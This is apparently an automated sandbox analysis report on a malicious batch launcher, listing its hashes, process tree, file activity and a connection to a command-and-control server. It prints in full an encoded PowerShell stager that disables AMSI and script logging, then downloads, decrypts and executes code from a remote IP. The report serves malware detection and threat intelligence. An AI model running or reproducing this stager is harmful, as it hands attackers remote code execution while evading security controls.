File name: | 3_launcher.bat |
Full analysis: | https://app.any.run/tasks/5ccf49e9-60a9-45eb-8488-3bf620f5d4b2 |
Verdict: | Malicious activity |
Analysis date: | May 14, 2019, 21:05:09 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | text/x-msdos-batch |
File info: | DOS batch file, ASCII text, with very long lines |
MD5: | 7F88D30970C9B5A35DD42AA8C127AF64 |
SHA1: | 770A8F4ECD2BAC296AEF15DDB12A4A53E69BCEF3 |
SHA256: | 41FBF421A1E7322AB78A98E9E75747A96AAEBBB5A2D716FEB9615AE3E871ADEB |
SSDEEP: | 96:CsQZ+ZB4InnAAdbYV0X3SwtGegY0foZY504sxsJAA+Gi+vYz3mFh:Ct05Y2XttVOYY53sUi4m3mL |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3364 | cmd /c ""C:\Users\admin\AppData\Local\Temp\3_launcher.bat" " | C:\Windows\system32\cmd.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2368 | powershell -noP -sta -w 1 -enc SQBGACgAJABQAFMAVgBlAFIAcwBpAE8ATgBUAGEAQgBsAEUALgBQAFMAVgBFAHIAcwBJAG8ATgAuAE0AYQBKAG8AcgAgAC0AZwBFACAAMwApAHsAJABHAFAARgA9AFsAUgBlAEYAXQAuAEEAUwBTAEUATQBCAEwAWQAuAEcARQBUAFQAWQBQAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAGUAdABGAEkAZQBgAGwARAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBGACgAJABHAFAARgApAHsAJABHAFAAQwA9ACQARwBQAEYALgBHAEUAdABWAGEAbAB1AEUAKAAkAG4AdQBMAEwAKQA7AEkARgAoACQARwBQAEMAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQApAHsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJABHAFAAQwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQA9ADAAfQAkAHYAYQBsAD0AWwBDAE8AbABMAEUAQwB0AEkATwBuAFMALgBHAEUAbgBFAFIASQBjAC4ARABJAGMAdABJAE8ATgBBAHIAeQBbAHMAdAByAEkAbgBHACwAUwBZAFMAdABlAG0ALgBPAGIASgBFAEMAVABdAF0AOgA6AG4AZQB3ACgAKQA7ACQAdgBhAGwALgBBAEQARAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAVgBBAEwALgBBAGQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJABHAFAAQwBbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AJABWAEEAbAB9AEUAbABzAGUAewBbAFMAYwBSAEkAUABUAEIAbABPAGMAawBdAC4AIgBHAEUAVABGAGkAZQBgAGwAZAAiACgAJwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBFAHQAVgBhAGwAdQBFACgAJABOAFUATABsACwAKABOAGUAdwAtAE8AQgBKAGUAYwBUACAAQwBvAGwAbABFAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAQwAuAEgAYQBzAEgAUwBFAHQAWwBzAFQAUgBpAE4ARwBdACkAKQB9AFsAUgBlAEYAXQAuAEEAUwBTAEUAbQBCAEwAeQAuAEcARQB0AFQAeQBwAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkAfAA/AHsAJABfAH0AfAAlAHsAJABfAC4ARwBFAHQARgBpAEUAbABEACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkAbABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBTAEUAVABWAGEAbABVAEUAKAAkAE4AVQBsAEwALAAkAFQAcgBVAEUAKQB9ADsAfQA7AFsAUwBZAFMAVABlAG0ALgBOAEUAVAAuAFMARQBSAFYASQBjAEUAUABvAGkATgBUAE0AQQBOAEEAZwBlAHIAXQA6ADoARQB4AHAARQBjAFQAMQAwADAAQwBPAE4AVABJAG4AdQBFAD0AMAA7ACQAVwBjAD0ATgBlAHcALQBPAGIASgBFAGMAVAAgAFMAeQBzAFQARQBtAC4ATgBFAFQALgBXAGUAQgBDAEwASQBFAG4AVAA7ACQAdQA9ACcATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVAByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAwACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHcAYwAuAEgAZQBBAGQARQByAHMALgBBAGQAZAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJAB1ACkAOwAkAFcAYwAuAFAAcgBPAHgAeQA9AFsAUwB5AFMAdABFAE0ALgBOAEUAdAAuAFcAZQBCAFIARQBRAHUAZQBzAFQAXQA6ADoARABlAGYAQQB1AGwAVABXAGUAQgBQAFIAbwBYAFkAOwAkAHcAQwAuAFAAcgBPAHgAeQAuAEMAcgBlAGQAZQBuAFQASQBhAGwAUwAgAD0AIABbAFMAWQBTAHQARQBNAC4ATgBFAHQALgBDAFIARQBEAGUATgB0AGkAQQBsAEMAQQBjAGgAZQBdADoAOgBEAGUAZgBhAFUATABUAE4ARQB0AHcAbwBSAGsAQwByAEUAZABFAE4AVABJAGEATABTADsAJABTAGMAcgBpAHAAdAA6AFAAcgBvAHgAeQAgAD0AIAAkAHcAYwAuAFAAcgBvAHgAeQA7ACQASwA9AFsAUwBZAHMAVABFAG0ALgBUAEUAeABUAC4ARQBuAEMAbwBEAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcARQBUAEIAeQB0AGUAUwAoACcARgBLADwAaQB0ACgAewBEAH4AcAByAHEAZQBCACkAdQBFAE8AUwBzAFIAOQBoADgAbABtAHcANgAsACYAQAA0ACcAKQA7ACQAUgA9AHsAJABEACwAJABLAD0AJABBAHIAZwBzADsAJABTAD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACUAewAkAEoAPQAoACQASgArACQAUwBbACQAXwBdACsAJABLAFsAJABfACUAJABLAC4AQwBPAFUATgB0AF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAEIAWABPAFIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAcwBlAHIAPQAnAGgAdAB0AHAAOgAvAC8AMwA0AC4AMgAzADgALgAyADMANQAuADcAMwA6ADgAMAAnADsAJAB0AD0AJwAvAG4AZQB3AHMALgBwAGgAcAAnADsAJAB3AEMALgBIAEUAYQBkAGUAUgBzAC4AQQBkAEQAKAAiAEMAbwBvAGsAaQBlACIALAAiAHMAZQBzAHMAaQBvAG4APQArADQAVgBaAHgAawBxAG4ASgBIAFcAYQBkAEcAWQBEADQAVABiAEcAMABUAHYANwBKADkAZwA9ACIAKQA7ACQARABhAFQAQQA9ACQAVwBDAC4ARABvAHcAbgBMAG8AYQBEAEQAYQB0AEEAKAAkAHMARQByACsAJABUACkAOwAkAEkAVgA9ACQARABBAHQAYQBbADAALgAuADMAXQA7ACQARABBAHQAYQA9ACQARABhAFQAYQBbADQALgAuACQAZABBAFQAQQAuAGwARQBOAEcAdABIAF0AOwAtAEoAbwBpAE4AWwBDAGgAQQBSAFsAXQBdACgAJgAgACQAUgAgACQARABBAFQAYQAgACgAJABJAFYAKwAkAEsAKQApAHwASQBFAFgA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1480 | cmd /c del "C:\Users\admin\AppData\Local\Temp\3_launcher.bat" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2368 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZSCQ1951GVDXPQY1BX2Y.temp | — | |
MD5:— | SHA256:— | |||
2368 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:33B4C42BAF9E3CA295E3BDCD51C02EAF | SHA256:B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5 | |||
2368 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF133e16.TMP | binary | |
MD5:33B4C42BAF9E3CA295E3BDCD51C02EAF | SHA256:B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2368 | powershell.exe | GET | — | 34.238.235.73:80 | http://34.238.235.73/news.php | US | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2368 | powershell.exe | 34.238.235.73:80 | — | Amazon.com, Inc. | US | malicious |